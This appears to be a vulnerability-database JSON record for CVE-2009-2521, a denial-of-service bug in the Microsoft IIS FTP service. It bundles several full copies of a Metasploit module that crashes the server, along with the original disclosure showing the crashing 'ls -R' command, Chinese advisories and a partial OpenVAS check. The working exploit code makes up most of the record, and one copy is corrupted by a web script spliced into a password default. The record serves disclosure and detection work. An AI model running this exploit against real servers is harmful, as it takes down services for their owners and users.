root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-12-13T05:17:58", "history": [], "viewCount": 140, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-12-13T05:17:58"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-12-13T05:17:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-12-13T05:17:58", "differentElements": ["modified", "published"], "edition": 118}], "viewCount": 143, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-12-13T11:11:04"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-12-13T11:11:04"}, "vulnersScore": 6.2}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}

{"cve": [{"lastseen": "2019-07-09T18:04:20", "bulletinFamily": "NVD", "description": "Stack consumption vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows remote authenticated users to cause a denial of service (daemon crash) via a list (ls) -R command containing a wildcard that references a subdirectory, followed by a .. (dot dot), aka \"IIS FTP Service DoS Vulnerability.\"", "modified": "2019-07-03T17:25:00", "id": "CVE-2009-2521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2521", "published": "2009-09-04T10:30:00", "title": "CVE-2009-2521", "type": "cve", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:13", "bulletinFamily": "exploit", "description": "", "modified": "2011-07-03T00:00:00", "published": "2011-07-03T00:00:00", "href": "https://packetstormsecurity.com/files/102750/Microsoft-IIS-FTP-Server-7.0-Stack-Exhaustion.html", "id": "PACKETSTORM:102750", "type": "packetstorm", "title": "Microsoft IIS FTP Server 7.0 Stack Exhaustion", "sourceData": "`# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS \n# Date: Jul 03, 2011 \n# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> \n# Software Link: http://www.microsoft.com/ \n# Version: 5.0 - 7.0 \n# Tested on: unpatched version of windows xp & 2k3 \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Auxiliary::Dos \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service', \n'Description' => %q{ \nThis module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as \"manual\" mode in startup type. \n}, \n'Author' => [ \n'Nikolaos \"Kingcope\" Rangos', # Bug Discoverer \n'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 1.0 $', \n'References' => \n[ \n[ 'CVE', '2009-2521'], \n[ 'BID', '36273'], \n[ 'OSVDB', '57753'], \n[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'], \n[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html'] \n \n], \n'DisclosureDate' => 'Sep 03 2009')) \n \nregister_options([ \nOptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]), \nOptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com<script type=\"text/javascript\"> \n/* <![CDATA[ */ \n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); \n/* ]]> */ \n</script>' ]) \n]) \nend \n \ndef run \n \nreturn unless connect_login \n \nprint_status(\"Sending DoS packets ...\") \n \nsend_cmd_data(['ls','-R */../'],nil) \n \ndisconnect \n \nprint_good(\"Done\") \n \nend \nend \n \n`\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102750/msiisftp-dos.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T18:37:25", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 36273\r\nCVE(CAN) ID: CVE-2009-2521\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u7684FTPd\u7684Glob\u529f\u80fd\u5728\u5904\u7406\u9012\u5f52\u76ee\u5f55\u5217\u8868\u8bf7\u6c42\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u62e5\u6709\u5bf9\u76ee\u5f55\u5199\u8bbf\u95ee\u6743\u9650\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u5305\u542b\u6709\u901a\u914d\u7b26\uff08\u5982\u201c*\u201d\uff09\u7684\u8bf7\u6c42\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4FTP\u670d\u52a1\u5d29\u6e83\u3002\n\nMicrosoft IIS 7.0\r\nMicrosoft IIS 6.0\r\nMicrosoft IIS 5.1\r\nMicrosoft IIS 5.0\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.microsoft.com/technet/security/", "modified": "2009-09-08T00:00:00", "published": "2009-09-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12236", "id": "SSV:12236", "title": "Microsoft IIS FTP\u670d\u52a1\u5668\u9012\u5f52\u5217\u8868\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n ftp&gt; ls &quot;-R p*/../&quot;\n ", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12236"}, {"lastseen": "2017-11-19T18:34:00", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 36273\r\nCVE ID: CVE-2009-2521\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u7684FTPd\u7684Glob\u529f\u80fd\u5728\u5904\u7406\u9012\u5f52\u76ee\u5f55\u5217\u8868\u8bf7\u6c42\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u62e5\u6709\u5bf9\u76ee\u5f55\u5199\u8bbf\u95ee\u6743\u9650\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u5305\u542b\u6709\u901a\u914d\u7b26\uff08\u5982\u201c*\u201d\uff09\u7684\u8bf7\u6c42\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4FTP\u670d\u52a1\u5d29\u6e83\u3002\n\nMicrosoft IIS 7.0\r\nMicrosoft IIS 6.0\r\nMicrosoft IIS 5.1\r\nMicrosoft IIS 5.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u7981\u7528FTP\u670d\u52a1\u3002\r\n* \u7981\u6b62\u533f\u540d\u7528\u6237\u7684FTP\u8bbf\u95ee\u6216\u5199\u8bbf\u95ee\u3002\r\n* \u4fee\u6539NTFS\u6587\u4ef6\u7cfb\u7edf\u6743\u9650\uff0c\u7981\u6b62FTP\u7528\u6237\u521b\u5efa\u76ee\u5f55\u3002\r\n* \u5347\u7ea7\u5230FTP Service 7.5\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS09-053\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS09-053\uff1aVulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx?pf=true", "modified": "2009-10-16T00:00:00", "published": "2009-10-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12477", "id": "SSV:12477", "title": "Microsoft IIS FTP\u670d\u52a1\u5668\u9012\u5f52\u5217\u8868\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e(MS09-053)", "type": "seebug", "sourceData": "\n ftp&gt; ls &quot;-R p*/../&quot;\n ", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12477"}], "exploitdb": [{"lastseen": "2016-02-02T07:56:27", "bulletinFamily": "exploit", "description": "Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053). CVE-2009-2521. Dos exploit for windows platform", "modified": "2011-07-03T00:00:00", "published": "2011-07-03T00:00:00", "id": "EDB-ID:17476", "href": "https://www.exploit-db.com/exploits/17476/", "type": "exploitdb", "title": "Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS MS09-053", "sourceData": "# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS\r\n# Date: Jul 03, 2011\r\n# Updated: Jul 13, 2011\r\n# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>\r\n# Software Link: http://www.microsoft.com/\r\n# Version: 5.0 - 7.0\r\n# Tested on: unpatched version of windows xp & 2k3\r\n\r\n##\r\n# $Id: $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\tinclude Msf::Auxiliary::Dos\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" service must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t\t'Nikolaos \"Kingcope\" Rangos', # Bug Discoverer\r\n\t\t\t\t\t'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module\r\n\t\t\t\t\t],\t\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 4 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-2521'],\r\n\t\t\t\t\t[ 'BID', '36273'],\r\n\t\t\t\t\t[ 'OSVDB', '57753'],\r\n\t\t\t\t\t[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\r\n\t\t\t\t\t[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 03 2009'))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),\r\n\t\t\tOptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com' ])\r\n\t\t])\r\n\tend\r\n\r\n\tdef run\t\t\t\t\r\n\t\tbegin\r\n\t\t\treturn unless connect_login\r\n\t\t\tprint_status('Checking if there is at least one directory ...')\t\r\n\t\t\tres = send_cmd_data(['ls'],'')\t\r\n\t\t\t\r\n\t\t\tif res.to_s =~ /\\<DIR\\> / then\r\n\t\t\t\tprint_status('Directory found, skipped creating a directory')\r\n\t\t\telse\r\n\t\t\t\tprint_status('No single directory found')\r\n\t\t\t\tprint_status('Attempting to create a directory ...')\t\r\n\t\t\t\tnew_dir = Rex::Text.rand_text_alphanumeric(6)\t\t\r\n\t\t\t\tres = send_cmd(['mkd',new_dir])\t\t\t\r\n\t\t\t\tif res =~ /directory created/ then\r\n\t\t\t\t\tprint_status(\"New directory \\\"#{new_dir}\\\" was created!\")\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_error('Write-access was denied')\r\n\t\t\t\t\tprint_error('Exploit failed')\r\n\t\t\t\t\tdisconnect\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\t\t\r\n\t\t\tend\t\t\r\n\t\t\t\r\n\t\t\tprint_status(\"Sending DoS packets ...\")\t\r\n\t\t\tres = send_cmd_datax(['ls','-R */../'],' ')\t\t\t\t\r\n\t\t\tdisconnect\t\t\t\t\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue Errno::ECONNRESET\r\n\t\t\tprint_good(\"MS IIS FTP Server has crashed successfully.\")\t\r\n\t\trescue ::Rex::ConnectionRefused\r\n\t\t\tprint_good(\"Cannot connect. The server is not running.\")\t\r\n\t\tend\r\n\tend\r\n\r\n\t# Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\r\n\t# Bug Tracker: 4868\r\n\tdef send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\r\n\t\targs[0] = \"LIST\"\r\n\t\t# Set the transfer mode and connect to the remove server\r\n\t\treturn nil if not data_connect(mode)\r\n\t\t# Our pending command should have got a connection now.\r\n\t\tres = send_cmd(args, true, nsock)\r\n\t\t# make sure could open port\r\n\t\treturn nil unless res =~ /^(150|125) /\r\n\t\t# dispatch to the proper method\r\n\t\tbegin\r\n\t\t\tdata = self.datasocket.get_once(-1, ftp_timeout)\r\n\t\trescue ::EOFError\r\n\t\t\tdata = nil\r\n\t\tend\r\n\t\tselect(nil,nil,nil,1)\r\n\t\t# close data channel so command channel updates\r\n\t\tdata_disconnect\r\n\t\t# get status of transfer\r\n\t\tret = nil\r\n\t\tret = recv_ftp_resp(nsock)\r\n\t\tret = [ ret, data ]\r\n\t\tret\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17476/"}, {"lastseen": "2016-02-01T10:55:59", "bulletinFamily": "exploit", "description": "Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service. CVE-2009-2521. Dos exploit for windows platform", "modified": "2009-09-04T00:00:00", "published": "2009-09-04T00:00:00", "id": "EDB-ID:9587", "href": "https://www.exploit-db.com/exploits/9587/", "type": "exploitdb", "title": "Microsoft IIS 5.0/6.0 FTP Server Stack Exhaustion Denial of Service", "sourceData": "***** MS IIS FTPD DoS ZER0DAY *****\r\n\r\nThere is a DoS vulnerability in the globbing functionality of IIS FTPD.\r\nAnonymous users can exploit this if they have read access to a directory!!!\r\nNormal users can exploit this too if they can read a directory.\r\n\r\nExample session where the anonymous user has read access to the folder \"pub\":\r\n\r\nC:\\Users\\Nikolaos>ftp 192.168.2.102\r\nVerbindung mit 192.168.2.102 wurde hergestellt.\r\n220 Microsoft FTP Service\r\nBenutzer (192.168.2.102:(none)): ftp\r\n331 Anonymous access allowed, send identity (e-mail name) as password.\r\nKennwort:\r\n230 Anonymous user logged in.\r\nftp> ls \"-R p*/../\"\r\n...\r\np*/../pub:\r\npub\r\n...\r\np*/../pub:\r\npub\r\n...\r\np*/../pub:\r\npub\r\n...\r\np*/../pub:\r\npub\r\n...\r\nVerbindung beendet durch Remotehost. (MEANS: Remote Host has closed\r\nthe connection)\r\nftp>\r\nftp>\r\n\r\nBy looking into my debugging session with OllyDbg I see that an\r\nexception is raised and\r\nthe ftp service crashes due to a \"stack overflow\", what is a stack exhaustion.\r\nIf the ftp service is set to \"manual\" startup in services control\r\nmanager the service\r\nneeds to be restarted manually.\r\nIIS 5.0 and 6.0 were tested and are affected.\r\n\r\nBest Regards,\r\n\r\nNikolaos Rangos\r\n\r\n# milw0rm.com [2009-09-04]\r\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9587/"}], "openvas": [{"lastseen": "2017-07-02T21:14:02", "bulletinFamily": "scanner", "description": "The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.", "modified": "2017-01-27T00:00:00", "published": "2009-09-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900944", "id": "OPENVAS:900944", "title": "Microsoft IIS FTP Server 'ls' Command DOS Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_iis_ftpd_ls_dos_vuln.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allows remote authenticated users to crash the\n application leading to denial of service condition.\n Impact Level: Application\";\ntag_affected = \"Microsoft Internet Information Services version 5.0 and 6.0\";\ntag_insight = \"A stack consumption error occurs in the FTP server while processing crafted\n LIST command containing a wildcard that references a subdirectory followed by\n a .. (dot dot).\";\ntag_solution = \"Upgrade to IIS version 7.5\n http://www.iis.net/\";\ntag_summary = \"The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.\";\n\nif(description)\n{\n script_id(900944);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-18 08:01:03 +0200 (Fri, 18 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-2521\");\n script_bugtraq_id(36273);\n script_name(\"Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/advisory/975191.mspx\");\n script_xref(name : \"URL\" , value : \"http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html\");\n script_xref(name : \"URL\" , value : \"http://blogs.technet.com/msrc/archive/2009/09/01/microsoft-security-advisory-975191-released.aspx\");\n script_xref(name : \"URL\" , value : \"http://blogs.technet.com/msrc/archive/2009/09/03/microsoft-security-advisory-975191-revised.aspx\");\n\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_ftp_anonymous.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 